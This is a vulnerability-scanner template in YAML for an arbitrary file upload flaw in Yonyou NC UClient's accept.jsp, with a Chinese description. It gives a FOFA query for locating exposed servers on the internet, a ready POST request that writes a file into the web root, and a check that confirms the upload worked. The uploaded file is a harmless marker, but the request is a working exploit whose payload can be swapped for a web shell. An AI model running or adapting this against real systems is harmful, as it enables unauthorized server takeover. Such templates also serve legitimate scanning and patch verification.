product: 用友NC-UClient
vName: 用友NC-UClient accept.jsp任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 用友NClient存在任意文件上传漏洞，攻击者可利用该漏洞获取服务器控制权。
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: https://blog.csdn.net/CommputerMac/article/details/134298160
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /aim/equipmap/accept.jsp
      file:
        fname:
          - null
          - \webapps\nc_web\52e039302a62d077.txt
        upload:
          - 52e039302a62d077.txt
          - 95cc64dd2825f9df13ec4ad683ecf339
          - text/plain
    verify:
      path: /52e039302a62d077.txt
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and